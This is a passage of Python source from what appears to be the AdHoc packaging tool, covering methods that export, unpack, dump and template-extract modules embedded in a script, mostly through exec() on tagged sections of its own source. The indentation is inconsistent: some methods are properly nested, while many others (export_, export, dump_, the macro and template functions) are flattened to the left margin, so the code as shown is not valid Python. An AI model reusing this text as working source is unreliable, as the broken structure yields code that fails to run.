                setattr(module, '__file__', file_)
                if os.access(file_, os.R_OK): # |:api_fi:|
                    stat = os.stat(file_)
                    adhoc.mtime = datetime.datetime.fromtimestamp(
                        stat.st_mtime)
                    adhoc.mode = stat.st_mode
                    if adhoc.mtime > mtime:
                        # the file on disk is newer than the adhoc'ed source
                        try:
                            delattr(adhoc, 'source')
                        except AttributeError:
                            pass
                        source = None
        # Adopt the supplied source only if it is newer than (or
        # missing from) the recorded state.
        if (mtime > adhoc.mtime
            or not hasattr(adhoc, 'source')):
            if source is not None:
                adhoc.source = source
                adhoc.mtime = mtime
                adhoc.mode = mode
        if not hasattr(adhoc, 'source'):
            try:
                file_ = module.__file__
                file_, source = cls.std_source_param(file_, source)
                adhoc.source = source
            except (AttributeError, IOError):
                # @:adhoc_run_time_section:@ off
                # if hasattr(module, '__path__'): # |:debug:|
                #     list(map(sys.stderr.write,
                #              ('module path: ', module.__path__, '\n')))
                # else:
                #     sys.stderr.write('no module.__path__\n')
                # list(map(sys.stderr.write,
                #          [''.join((attr, str(value), "\n")) for attr, value in
                #           filter(lambda i: i[0] != '__builtins__',
                #                  sorted(vars(module).items()))]))
                if cls.verbose:
                    (t, e, tb) = sys.exc_info()
                    import traceback
                    printe(''.join(traceback.format_tb(tb)), end='')
                    printe(sformat('{0}: {1}', t.__name__, e))
                    del(tb)
                # @:adhoc_run_time_section:@ on
                pass
        return module
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Export Tools
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def std_source_param(cls, file_=None, source=None): # |:clm:||:api_fi:|
# @:adhoc_run_time_section:@ off
'''Setup standard source parameters.
:returns: tuple ``( file_, source )``
:param file_: If None, `__file__` is used. If it ends with
``.pyc``, it is transformed to ``.py``.
:param source: If None, the result of :meth:`read_source` is
used.
'''
# @:adhoc_run_time_section:@ on
if file_ is None:
file_ = __file__
if file_.endswith('.pyc'):
file_ = file_[:-1]
if source is None:
source = cls.read_source(file_)
return (file_, source)
@classmethod
def export_source(cls, string, no_remove=False, no_disable=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''
============================ =========================
check for |adhoc_remove| sections and remove them!
check for |adhoc_import| sections and remove them!
check for |adhoc_unpack| sections and remove them!
check for |adhoc_template_v| sections and remove them!
check for |adhoc_disable| sections and enable them!
check for |adhoc_enable| sections and disable them!
check for |adhoc_remove_| section markers and rename them!
============================ =========================
'''
# @:adhoc_run_time_section:@ on
string = cls.collapse_macros(string)
if not no_remove:
string = cls.remove_sections(string, 'adhoc_remove')
string = cls.remove_sections(string, 'adhoc_import')
string = cls.remove_sections(string, 'adhoc_unpack')
string = cls.remove_sections(string, 'adhoc_template_v')
if not no_disable:
string = cls.enable_sections(string, 'adhoc_disable')
string = cls.disable_sections(string, 'adhoc_enable')
if not no_remove:
string = cls.section_tag_rename(string, 'adhoc_remove_', 'adhoc_remove')
return string
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Extract Interface
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
    @classmethod
    def unpack(cls, file_=None, source=None): # |:clm:|
        # @:adhoc_run_time_section:@ off
        """Unpack all adhoc'ed files in |adhoc_unpack| sections."""
        # @:adhoc_run_time_section:@ on
        file_, source = cls.std_source_param(file_, source)
        source_sections, unpack_sections = cls.tag_partition(
            source, cls.section_tag('adhoc_unpack'))
        sv_extract_warn = cls.extract_warn
        cls.extract_warn = True
        unpack_call = ''.join((cls.__name__, '.unpack_'))
        for unpack_section in unpack_sections:
            # Rewrite the head of the stored call expression so it
            # invokes <this class>.unpack_, regardless of the class
            # name it was packed with.
            unpack_section = re.sub('^\\s+', '', unpack_section)
            unpack_section = re.sub(
                '^[^(]*(?s)', unpack_call, unpack_section)
            try:
                #RtAdHoc = cls # unpack_call takes care of this
                exec(unpack_section.lstrip(), globals(), locals())
            except IndentationError:
                sys.stderr.write("!!! IndentationError !!!\n")
                # @:adhoc_run_time_section:@ off
                sys.stderr.write(''.join((unpack_section, "\n")))
                # @:adhoc_run_time_section:@ on
        cls.extract_warn = sv_extract_warn
    @classmethod
    def extract(cls, file_=None, source=None): # |:clm:|
        # @:adhoc_run_time_section:@ off
        """Unpack all adhoc'ed files in |adhoc_unpack| sections and
        extract all templates."""
        # @:adhoc_run_time_section:@ on
        cls.unpack(file_, source)
        cls.extract_templates(file_, source, export=True)
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Export Interface
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
    @classmethod
    def export__(cls, mod_name=None, file_=None, mtime=None, # |:clm:||:api_fi:|
                 mode=None, zipped=True, flat=None, source64=None):
        """Export a single adhoc'ed file during export (see :meth:`export_`)."""
        source = cls.unpack_file(source64, zipped=zipped, decode=False)
        # @:adhoc_run_time_section:@ off
        if cls.debug:
            sys.stderr.write(
                ''.join(("# xp: ", cls.__name__, ".export__ for `",
                         file_, "`\n")))
        # @:adhoc_run_time_section:@ on
        if file_ is None:
            return
        file_base = os.path.basename(file_)
        if file_base.startswith('__init__.py'):
            is_init = True
        else:
            is_init = False
        # Derive the package directory from the dotted module name and
        # record which directories need/have an __init__ file.
        parts = mod_name.split('.')
        base = parts.pop()
        if parts:
            module_dir = os.path.join(*parts)
            cls.export_need_init[module_dir] = True
        else:
            module_dir = ''
        if is_init:
            module_dir = os.path.join(module_dir, base)
            cls.export_have_init[module_dir] = True
        module_file = os.path.join(module_dir, file_base)
        cls.export_(source, module_file, mtime, mode, flat)
@classmethod
def export_(cls, source, file_, mtime, mode, flat=None): # |:clm:|
cflat = cls.flat
if flat is None:
flat = cflat
cls.flat = flat
if not flat:
# extract to export directory
sv_extract_dir = cls.extract_dir
cls.extract_dir = cls.export_dir
cls.extract(file_, source)
cls.extract_dir = sv_extract_dir
source_sections, import_sections = cls.tag_partition(
source, cls.section_tag('adhoc_import'))
source = cls.export_source(''.join(source_sections))
export_call = ''.join((cls.__name__, '.export__'))
xfile = cls.check_xfile(file_, cls.export_dir)
if xfile is not None:
cls.write_source(xfile, source, mtime, mode)
if cls.verbose:
list(map(sys.stderr.write,
("# xp: ", cls.__name__, ".export_ for `", file_,
"` using `", export_call,"`\n")))
for import_section in import_sections:
# this calls RtAdHoc.export__
import_section = re.sub('^\\s+', '', import_section)
import_section = re.sub(
'^[^(]*(?s)', export_call, import_section)
try:
#RtAdHoc = cls # export_call takes care of this
exec(import_section, globals(), locals())
except IndentationError:
sys.stderr.write("!!! IndentationError !!!\n")
# @:adhoc_run_time_section:@ off
sys.stderr.write(''.join((import_section, "\n")))
# @:adhoc_run_time_section:@ on
else:
xfile = cls.check_xfile(file_, cls.export_dir)
if xfile is not None:
cls.write_source(xfile, source, mtime, mode)
if cls.verbose:
list(map(sys.stderr.write,
("# xp: ", cls.__name__, ".export_ for `", file_,
"` using `", export_call,"`\n")))
cls.flat = cflat
# @:adhoc_run_time_section:@ off
default_engine = False
# @:adhoc_run_time_section:@ on
@classmethod
def export(cls, file_=None, source=None): # |:clm:|
file_, source = cls.std_source_param(file_, source)
# @:adhoc_run_time_section:@ off
# |:todo:| this chaos needs cleanup (cls.import_/cls.export__)
# @:adhoc_run_time_section:@ on
sv_import = cls.import_
cls.import_ = cls.export__
file_ = os.path.basename(file_)
# @:adhoc_run_time_section:@ off
if cls.verbose:
list(map(sys.stderr.write,
("# xp: ", cls.__name__, ".export for `", file_, "`\n")))
# @:adhoc_run_time_section:@ on
cls.export_(source, file_, None, None, False)
sv_extract_dir = cls.extract_dir
cls.extract_dir = cls.export_dir
engine_tag = cls.section_tag('adhoc_run_time_engine')
engine_source = cls.export_source(
source, no_remove=True, no_disable=True)
engine_source = cls.get_named_template(
None, file_, engine_source, tag=engine_tag, ignore_mark=True)
# @:adhoc_run_time_section:@ off
if cls.default_engine and not engine_source:
state = cls.set_delimiters(('@:', ':@'))
ah = cls()
engine_source = ah.prepare_run_time_section()
engine_source = cls.get_named_template(
None, file_, engine_source, tag=engine_tag, ignore_mark=True)
cls.reset_delimiters(state)
# @:adhoc_run_time_section:@ on
if engine_source:
efile = cls.check_xfile('rt_adhoc.py')
if efile is not None:
cls.write_source(efile, engine_source)
cls.extract_dir = sv_extract_dir
for init_dir in cls.export_need_init:
if not cls.export_have_init[init_dir]:
if cls.verbose:
list(map(sys.stderr.write,
("# xp: create __init__.py in `", init_dir, "`\n")))
inf = open(os.path.join(
cls.export_dir, init_dir, '__init__.py'), 'w')
inf.write('')
inf.close()
cls.import_ = sv_import
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Dump Interface (Import/Unpack Substitute)
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def dump__(cls, mod_name=None, file_=None, mtime=None, # |:clm:||:api_fi:|
mode=None, zipped=True, flat=None, source64=None):
if cls.verbose:
list(map(sys.stderr.write,
("# xf: ", cls.__name__, ": dumping `", file_, "`\n")))
source = cls.unpack_file(source64, zipped=zipped, decode=False)
return source
@classmethod
def dump_(cls, dump_section, dump_type=None): # |:clm:|
if dump_type is None:
dump_type = 'adhoc_import'
if not dump_section:
return ''
dump_call = ''.join(('unpacked = ', cls.__name__, '.dump__'))
dump_section = re.sub('^\\s+', '', dump_section)
dump_section = re.sub(
'^[^(]*(?s)', dump_call, dump_section)
dump_dict = {'unpacked': ''}
try:
#RtAdHoc = cls # dump_call takes care of this
exec(dump_section.lstrip(), globals(), dump_dict)
except IndentationError:
sys.stderr.write("!!! IndentationError !!!\n")
# @:adhoc_run_time_section:@ off
sys.stderr.write(''.join((dump_section, "\n")))
# @:adhoc_run_time_section:@ on
return dump_dict['unpacked']
@classmethod
def dump_file(cls, match, file_=None, source=None, tag=None, # |:clm:|
is_re=False):
file_, source = cls.std_source_param(file_, source)
if tag is None:
tag = cls.section_tag('(adhoc_import|adhoc_update)', is_re=True)
is_re = True
source_sections, dump_sections = cls.tag_partition(
source, tag, is_re, headline=True)
dump_call = ''.join((cls.__name__, '.dump_'))
for dump_section in dump_sections:
tagged_line = dump_section[0]
dump_section = dump_section[1]
tag_arg = cls.section_tag_strip(tagged_line)
check_match = match
if tag_arg != match and not match.startswith('-'):
check_match = ''.join(('-', match))
if tag_arg != match and not match.startswith('!'):
check_match = ''.join(('!', match))
if tag_arg != match:
continue
dump_section = re.sub('^\\s+', '', dump_section)
dump_section = re.sub(
'^[^(]*(?s)', dump_call, dump_section)
try:
#RtAdHoc = cls # dump_call takes care of this
exec(dump_section.lstrip(), globals(), locals())
except IndentationError:
sys.stderr.write("!!! IndentationError !!!\n")
# @:adhoc_run_time_section:@ off
sys.stderr.write(''.join((dump_section, "\n")))
# @:adhoc_run_time_section:@ on
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Macros
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
macro_call_delimiters = ('@|:', ':|>')
# @:adhoc_run_time_section:@ off
"""Macro delimiters"""
# @:adhoc_run_time_section:@ on
macro_xdef_delimiters = ('<|:', ':|@')
# @:adhoc_run_time_section:@ off
"""Macro expansion delimiters"""
# @:adhoc_run_time_section:@ on
macros = {}
# @:adhoc_run_time_section:@ off
"""Macros"""
# @:adhoc_run_time_section:@ on
@classmethod
def expand_macros(cls, source, macro_call_dlm=None, macro_xdef_dlm=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""
>>> AdHoc.macros['uc_descr_end'] = (
... '# o:' 'adhoc_template:>\\n'
... '# <:' 'adhoc_uncomment:>\\n'
... )
>>> macro_source = '# ' + AdHoc.adhoc_tag('uc_descr_end', AdHoc.macro_call_delimiters) + '\\n'
>>> ign = sys.stdout.write(macro_source) #doctest: +ELLIPSIS
# @|:uc_descr_end...:|>
>>> ign = sys.stdout.write(AdHoc.expand_macros(macro_source)) #doctest: +ELLIPSIS
# <|:adhoc_macro_call...:|@
# @|:uc_descr_end...:|>
# <|:adhoc_macro_call...:|@
# <|:adhoc_macro_expansion...:|@
# o:adhoc_template...:>
# <:adhoc_uncomment...:>
# <|:adhoc_macro_expansion...:|@
"""
# @:adhoc_run_time_section:@ on
if macro_call_dlm is None:
macro_call_dlm = cls.macro_call_delimiters
if macro_xdef_dlm is None:
macro_xdef_dlm = cls.macro_xdef_delimiters
import re
for macro_name, macro_expansion in cls.macros.items():
macro_tag = cls.adhoc_tag(macro_name, macro_call_dlm, False)
macro_tag_rx = cls.adhoc_tag(macro_name, macro_call_dlm, True)
macro_call = ''.join(('# ', macro_tag, '\n'))
macro_call_rx = ''.join(('^[^\n]*', macro_tag_rx, '[^\n]*\n'))
mc_tag = ''.join(('# ', cls.adhoc_tag('adhoc_macro_call', macro_xdef_dlm, False), "\n"))
mx_tag = ''.join(('# ', cls.adhoc_tag('adhoc_macro_expansion', macro_xdef_dlm, False), "\n"))
xdef = ''.join((
mc_tag,
macro_call,
mc_tag,
mx_tag,
macro_expansion,
mx_tag,
))
rx = re.compile(macro_call_rx, re.M)
source = rx.sub(xdef, source)
return source
@classmethod
def has_expanded_macros(cls, source, macro_xdef_dlm=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""
"""
# @:adhoc_run_time_section:@ on
if macro_xdef_dlm is None:
macro_xdef_dlm = cls.macro_xdef_delimiters
mx_tag = cls.adhoc_tag('adhoc_macro_expansion', macro_xdef_dlm, False)
me_count = len(cls.tag_lines(source, mx_tag))
return me_count > 0
@classmethod
def activate_macros(cls, source, macro_call_dlm=None, macro_xdef_dlm=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""
"""
# @:adhoc_run_time_section:@ on
if macro_xdef_dlm is None:
macro_xdef_dlm = cls.macro_xdef_delimiters
if not cls.has_expanded_macros(source, macro_xdef_dlm):
source = cls.expand_macros(source, macro_call_dlm, macro_xdef_dlm)
sv = cls.set_delimiters (macro_xdef_dlm)
source = cls.remove_sections(source, 'adhoc_macro_call')
source = cls.section_tag_remove(source, 'adhoc_macro_expansion')
cls.reset_delimiters(sv)
return source
@classmethod
def collapse_macros(cls, source, macro_xdef_dlm=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""
"""
# @:adhoc_run_time_section:@ on
if macro_xdef_dlm is None:
macro_xdef_dlm = cls.macro_xdef_delimiters
if cls.has_expanded_macros(source, macro_xdef_dlm):
sv = cls.set_delimiters (macro_xdef_dlm)
source = cls.section_tag_remove(source, 'adhoc_macro_call')
source = cls.remove_sections(source, 'adhoc_macro_expansion')
cls.reset_delimiters(sv)
return source
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Template Interface
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def std_template_param(cls, file_=None, source=None, # |:clm:|
tag=None, is_re=False, all_=False):
# @:adhoc_run_time_section:@ off
'''Setup standard template parameters.
:param tag: If None, section tag `adhoc_template(_v)?` is
used.
See :meth:`std_source_param` for `file_` and `source`.
'''
# @:adhoc_run_time_section:@ on
file_, source = cls.std_source_param(file_, source)
if tag is None:
is_re=True
if all_:
tag = cls.section_tag('adhoc_(template(_v)?|import|unpack)', is_re=is_re)
else:
tag = cls.section_tag('adhoc_template(_v)?', is_re=is_re)
source = cls.activate_macros(source)
return (file_, source, tag, is_re)
    @classmethod
    def get_templates(cls, file_=None, source=None,        # |:clm:|
                      tag=None, is_re=False,
                      ignore_mark=False, all_=False):
        # @:adhoc_run_time_section:@ off
        '''Extract templates matching section tag.

        :param ignore_mark: If True, all templates are mapped to
          standard output name ``-``.
        :param tag: If None, `adhoc_template` is used.
        :returns: dict mapping template name to joined section text,
          or to a (text, tag) tuple when `all_` is true.
        '''
        # @:adhoc_run_time_section:@ on
        file_, source, tag, is_re = cls.std_template_param(
            file_, source, tag, is_re, all_)
        # Activate commented-out and indented regions before
        # collecting the sections.
        source = cls.enable_sections(source, 'adhoc_uncomment')
        source = cls.indent_sections(source, 'adhoc_indent')
        source_sections, template_sections = cls.tag_partition(
            source, tag, is_re=is_re, headline=True)
        templates = {}
        for template_section in template_sections:
            tagged_line = template_section[0]
            section = template_section[1]
            # NOTE: `tag` is rebound here to this section's own tag,
            # shadowing the parameter; it is stored with the section
            # text for the `all_` result.
            tag, tag_arg = cls.section_tag_parse(tagged_line)
            if not tag_arg:
                tag_arg = '-'
            if tag_arg in cls.template_process_hooks:
                section = cls.template_process_hooks[tag_arg](cls, section, tag, tag_arg)
            if ignore_mark:
                tag_arg = '-'
            # Interleaved sections with the same name are accumulated
            # in source order and joined below.
            if tag_arg not in templates:
                templates[tag_arg] = [[section], tag]
            else:
                templates[tag_arg][0].append(section)
        if all_:
            result = dict([(m, (''.join(t[0]), t[1])) for m, t in templates.items()])
        else:
            result = dict([(m, ''.join(t[0])) for m, t in templates.items()])
        return result
    @classmethod
    def template_list(cls, file_=None, source=None,        # |:clm:|
                      tag=None, is_re=False, all_=False):
        # @:adhoc_run_time_section:@ off
        """Sorted list of templates.

        See :meth:`std_template_param` for `file_`, `source`, `tag`, `is_re`.

        .. @:adhoc_disable:@

        >>> for tpl in AdHoc.template_list():
        ...     printf(tpl)
        -
        README.txt
        -adhoc_init
        -catch-stdout
        -col-param-closure
        doc/USE_CASES.txt
        doc/index.rst
        -max-width-class
        -rst-to-ascii
        -test

        >>> for tpl in AdHoc.template_list(all_=True):
        ...     printf(strclean(tpl))
        ('-', 'adhoc_template')
        ('README.txt', 'adhoc_template')
        ('-adhoc_init', 'adhoc_template')
        ('-catch-stdout', 'adhoc_template')
        ('-col-param-closure', 'adhoc_template')
        ('doc/USE_CASES.txt', 'adhoc_template')
        ('doc/index.rst', 'adhoc_template')
        ('-max-width-class', 'adhoc_template')
        ('-rst-to-ascii', 'adhoc_template')
        ('-test', 'adhoc_template')

        .. @:adhoc_disable:@
        """
        # @:adhoc_run_time_section:@ on
        file_, source, tag, is_re = cls.std_template_param(
            file_, source, tag, is_re, all_)
        templates = cls.get_templates(file_, source, tag, is_re, all_=all_)
        if all_:
            # Merge statically registered extras as (name, ('', type))
            # entries, then sort by type, then by name with a leading
            # '-'/'!' marker stripped.
            templates.update([(k, ('', v)) for k, v in cls.extra_templates])
            result = list(sorted(
                [(k, v[1]) for k, v in templates.items()],
                key=lambda kt: '||'.join((
                    kt[1],
                    (((not (kt[0].startswith('-') or kt[0].startswith('!')))
                      and (kt[0]))
                     or (kt[0][1:]))))))
        else:
            # Only plain template extras are merged here; the dict
            # values are irrelevant since only the keys are returned.
            templates.update(filter(
                lambda tdef: (tdef[1] == 'adhoc_template'
                              or tdef[1] == 'adhoc_template_v'),
                cls.extra_templates))
            result = list(sorted(
                templates.keys(),
                key=lambda kt: '||'.join((
                    (((not (kt.startswith('-') or kt.startswith('!')))
                      and (kt)) or (kt[1:]))))))
        return result
# @:adhoc_run_time_section:@ off
# @:adhoc_template:@ -col-param-closure
# @:adhoc_run_time_section:@ on
@classmethod
def col_param_closure(cls): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Closure for setting up maximum width, padding and separator
for table columns.
:returns: a setter and a getter function for calculating the
maximum width of a list of strings (e.g. a table column).
>>> set_, get_ = AdHoc.col_param_closure()
>>> i = set_("string")
>>> get_()
[6, ' ', '======']
>>> i = set_("str")
>>> get_()
[6, ' ', '======']
>>> i = set_("longer string")
>>> get_()
[13, ' ', '=============']
>>> table_in = """\\
... Column1 Column2
... some text text
... some-more-text text text
... something text
... less"""
A splitter and column parameters depending on column count:
>>> col_count = 2
>>> splitter = lambda line: line.split(' ', col_count-1)
>>> col_params = [AdHoc.col_param_closure() for i in range(col_count)]
Generic table processor:
>>> process_cols = lambda cols: [
... col_params[indx][0](col) for indx, col in enumerate(cols)]
>>> table = [process_cols(cols) for cols in
... [splitter(line) for line in table_in.splitlines()]]
Generic table output parameters/functions:
>>> mws = [cp[1]()[0] for cp in col_params]
>>> sep = ' '.join([cp[1]()[2] for cp in col_params])
>>> paddings = [cp[1]()[1] for cp in col_params]
>>> pad_cols_c = lambda cols: [
... (((paddings[indx] is None) and (col))
... or ((paddings[indx][:int((mws[indx]-len(col))/2)]
... + col + paddings[indx])[:mws[indx]]))
... for indx, col in enumerate(cols)]
>>> pad_cols = lambda cols: [
... (((paddings[indx] is None) and (col))
... or ((col + paddings[indx])[:mws[indx]]))
... for indx, col in enumerate(cols)]
Generic table output generator:
>>> output = []
>>> if table:
... output.append(sep)
... output.append(' '.join(pad_cols_c(table.pop(0))).rstrip())
... if table: output.append(sep)
... output.extend([' '.join(pad_cols(cols)).rstrip()
... for cols in table])
... output.append(sep)
>>> i = sys.stdout.write("\\n".join(output))
============== =========
Column1 Column2
============== =========
some text text
some-more-text text text
something text
less
============== =========
'''
# @:adhoc_run_time_section:@ on
mw = [0, "", ""]
def set_(col): # |:clo:|
lc = len(col)
if mw[0] < lc:
mw[0] = lc
mw[1] = " " * lc
mw[2] = "=" * lc
return col
def get_(): # |:clo:|
return mw
return set_, get_
# @:adhoc_run_time_section:@ off
# @:adhoc_template:@ -col-param-closure
# @:adhoc_run_time_section:@ on
tt_ide = False
tt_comment = ''
tt_prefix = ''
tt_suffix = ''
    @classmethod
    def template_table(cls, file_=None, source=None,       # |:clm:|
                       tag=None, is_re=False):
        # @:adhoc_run_time_section:@ off
        '''Table of template commands.

        See :meth:`std_template_param` for `file_`, `source`, `tag`, `is_re`.

        :returns: list of output lines (rows plus '=' separator rows).
        '''
        # @:adhoc_run_time_section:@ on
        file_, source, tag, is_re = cls.std_template_param(
            file_, source, tag, is_re, all_=True)
        pfx = cls.tt_prefix
        sfx = cls.tt_suffix
        comm = cls.tt_comment
        if comm:
            comm = ''.join((comm, ' '))
            pfx = ''.join((comm, pfx))
        if cls.tt_ide:
            command = ''.join(('python ', file_))
        else:
            command = os.path.basename(file_)
        # Parse table
        table = []
        # Strip a leading '-'/'!' marker from the template name.
        tpl_arg_name = (lambda t: (((not (t.startswith('-') or t.startswith('!'))) and (t)) or (t[1:])))
        # One width/padding/separator tracker per column.
        col_param = [cls.col_param_closure() for i in range(3)]
        table.append((col_param[0][0]('Command'), col_param[1][0]('Template'), col_param[2][0]('Type')))
        table.extend([
            (col_param[0][0](''.join((
                pfx,
                command, ' --template ',
                tpl_arg_name(t[0])
                )).rstrip()),
             col_param[1][0](''.join((
                 '# ', t[0]
                 )).rstrip()),
             col_param[2][0](''.join((
                 t[1], sfx
                 )).rstrip()),)
            for t in cls.template_list(file_, source, tag, is_re, all_=True)])
        if cls.tt_ide:
            # Rebuild the table with IDE helper rows (':ide:' markers)
            # inserted around each group of rows sharing a type.  The
            # table is walked in reverse so each row's marker precedes
            # it in the final output.
            itable = []
            headers = table.pop(0)
            this_type = None
            last_type = None
            for cols in reversed(table):
                this_type = cols[2].replace('")', '')
                if last_type is not None:
                    if last_type != this_type:
                        itable.append((''.join((comm, ':ide: +#-+')), '', ''))
                        itable.append((''.join((comm, '. ', last_type, '()')), '', ''))
                    itable.append(('', '', ''))
                itable.append((''.join((comm, ':ide: ', cols[1].replace('#', 'AdHoc:'))), '', ''))
                itable.append(cols)
                itable.append(('', '', ''))
                last_type = this_type
            if last_type is not None:
                itable.append((''.join((comm, ':ide: +#-+')), '', ''))
                itable.append((''.join((comm, '. ', last_type, '()')), '', ''))
            table = [headers]
            table.extend(itable)
        # Setup table output
        mw, padding = (col_param[0][1]()[0], col_param[0][1]()[1])
        mw1, padding1 = (col_param[1][1]()[0], col_param[1][1]()[1])
        mw2, padding2 = (col_param[2][1]()[0], col_param[2][1]()[1])
        sep = ' '.join([cp[1]()[2] for cp in col_param])
        # Centered row (used for the header line).
        make_row_c = lambda row: ''.join((
            ''.join((padding[:int((mw-len(row[0]))/2)], row[0], padding))[:mw],
            ' ', ''.join((padding1[:int((mw1-len(row[1]))/2)],
                          row[1], padding1))[:mw1],
            ' ', ''.join((padding2[:int((mw2-len(row[2]))/2)],
                          row[2], padding2))[:mw2].rstrip()))
        # Left-aligned row.
        # NOTE(review): column 1 is padded with `padding` (column 0's
        # spaces) rather than `padding1` -- looks like a typo; it is
        # harmless as long as column 0 is at least as wide as needed.
        make_row = lambda row: ''.join((''.join((row[0], padding))[:mw],
                                        ' ', ''.join((row[1], padding))[:mw1],
                                        ' ', row[2])).rstrip()
        # Generate table
        output = []
        output.append(sep)
        output.append(make_row_c(table.pop(0)))
        if table:
            output.append(sep)
        output.extend([make_row(row) for row in table])
        output.append(sep)
        return output
@classmethod
def get_named_template(cls, name=None, file_=None, source=None, # |:clm:|
tag=None, is_re=False, ignore_mark=False):
# @:adhoc_run_time_section:@ off
'''Extract templates matching section tag and name.
:param name: Template name. If None, standard output name ``-`` is used.
:param tag: If None, `adhoc_template(_v)?` is used.
:param ignore_mark: If True, all templates are mapped to
standard output name ``-``.
If a named template cannot be found and `name` does not start
with ``-``, the template name `-name` is tried.
>>> ign = main("adhoc.py --template adhoc_test.sub".split())
# -*- coding: utf-8 -*-
<BLANKLINE>
ADHOC_TEST_SUB_IMPORTED = True
'''
# @:adhoc_run_time_section:@ on
if name is None:
name = '-'
file_, source, tag, is_re = cls.std_template_param(
file_, source, tag, is_re, all_=True)
templates = cls.get_templates(
file_, source, tag, is_re=is_re, ignore_mark=ignore_mark, all_=True)
check_name = name
if check_name not in templates and not name.startswith('-'):
check_name = ''.join(('-', name))
if check_name not in templates and not name.startswith('!'):
check_name = ''.join(('!', name))
if check_name in templates:
template_set = templates[check_name]
else:
template_set = ['', 'adhoc_template']
template = template_set[0]
template_type = template_set[1]
if check_name.startswith('!'):
template = cls.dump_(template, template_type)
return template
@classmethod
def extract_templates(cls, file_=None, source=None, # |:clm:|
tag=None, is_re=False, ignore_mark=False,
export=False):
# @:adhoc_run_time_section:@ off
'''Extract template.
# @:adhoc_template_check:@ -mark
A template ...
# @:adhoc_template_check:@
# @:adhoc_template_check:@ -other
Another interleaved
# @:adhoc_template_check:@
# @:adhoc_template_check:@ -mark
continued
# @:adhoc_template_check:@
>>> AdHoc.extract_templates(
... tag=AdHoc.section_tag("adhoc_template_check"))
A template ...
continued
Another interleaved
>>> rt_section = AdHoc.get_templates(
... __file__, None,
... tag=AdHoc.section_tag("adhoc_run_time_section"),
... ignore_mark=True)
>>> rt_section = ''.join(rt_section.values())
.. >>> printf(rt_section)
'''
# @:adhoc_run_time_section:@ on
file_, source, tag, is_re = cls.std_template_param(
file_, source, tag, is_re)
templates = cls.get_templates(
file_, source, tag, is_re=is_re, ignore_mark=ignore_mark)
sv_extract_warn = cls.extract_warn
cls.extract_warn = True
for outf, template in sorted(templates.items()):
if outf.startswith('-'):
outf = '-'
if outf == '-' and export:
continue
xfile = cls.check_xfile(outf, cls.extract_dir)
if xfile is not None:
cls.write_source(xfile, template)
cls.extract_warn = sv_extract_warn
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| COMPILER DATA
# --------------------------------------------------
# tags are generated from symbols on init
run_time_flag = None # line
import_flag = None # line
include_flag = None # line
verbatim_flag = None # line
compiled_flag = None # line
run_time_class_flag = None # line
rt_engine_section_tag = None # section
indent_section_tag = None # section
uncomment_section_tag = None # section
enable_section_tag = None # section
disable_section_tag = None # section
remove_section_tag = None # section
import_section_tag = None # section
unpack_section_tag = None # section
template_v_section_tag = None # section
template_section_tag = None # section
run_time_section_tag = None # section
run_time_section = None
run_time_flag_symbol = 'adhoc_run_time' # line
import_flag_symbol = 'adhoc' # line
include_flag_symbol = 'adhoc_include' # line
verbatim_flag_symbol = 'adhoc_verbatim' # line
compiled_flag_symbol = 'adhoc_compiled' # line
run_time_class_symbol = 'adhoc_run_time_class' # line
rt_engine_section_symbol = 'adhoc_run_time_engine' # section
indent_section_symbol = 'adhoc_indent' # section
uncomment_section_symbol = 'adhoc_uncomment' # section
enable_section_symbol = 'adhoc_enable' # section
disable_section_symbol = 'adhoc_disable' # section
remove_section_symbol = 'adhoc_remove' # section
import_section_symbol = 'adhoc_import' # section
unpack_section_symbol = 'adhoc_unpack' # section
template_v_section_symbol = 'adhoc_template_v' # section
template_section_symbol = 'adhoc_template' # section
run_time_section_symbol = 'adhoc_run_time_section' # section
run_time_class_prefix = 'Rt'
import_function = 'AdHoc.import_'
modules = {}
compiling = []
file_include_template = ( # |:api_fi:|
"{ind}"
"# {stg}\n{ind}"
"{rtp}{ahc}("
"{mod},"
" file_={fnm},\n{ina}"
" mtime={mtm},"
" mode={fmd},\n{ina}"
" zipped={zip},"
" flat={flt},"
" source64=\n"
"{src}"
")\n{ind}"
"# {etg}\n"
)
# --------------------------------------------------
# ||:sec:|| Setup
# --------------------------------------------------
def __init__(self): # |:mth:|
self.modules = {}
self.compiling = []
self.setup_tags()
self.run_time_section = self.prepare_run_time_section().rstrip() + '\n'
@classmethod
def setup_tags(cls): # |:mth:|
cls.run_time_flag = cls.line_tag(cls.run_time_flag_symbol)
cls.import_flag = cls.line_tag(cls.import_flag_symbol)
cls.verbatim_flag = cls.line_tag(cls.verbatim_flag_symbol)
cls.include_flag = cls.line_tag(cls.include_flag_symbol)
cls.compiled_flag = cls.line_tag(cls.compiled_flag_symbol)
cls.run_time_class_flag = cls.line_tag(cls.run_time_class_symbol)
cls.rt_engine_section_tag = cls.section_tag(cls.rt_engine_section_symbol)
cls.indent_section_tag = cls.section_tag(cls.indent_section_symbol)
cls.uncomment_section_tag = cls.section_tag(cls.uncomment_section_symbol)
cls.enable_section_tag = cls.section_tag(cls.enable_section_symbol)
cls.disable_section_tag = cls.section_tag(cls.disable_section_symbol)
cls.remove_section_tag = cls.section_tag(cls.remove_section_symbol)
cls.import_section_tag = cls.section_tag(cls.import_section_symbol)
cls.unpack_section_tag = cls.section_tag(cls.unpack_section_symbol)
cls.template_v_section_tag = cls.section_tag(cls.template_v_section_symbol)
cls.template_section_tag = cls.section_tag(cls.template_section_symbol)
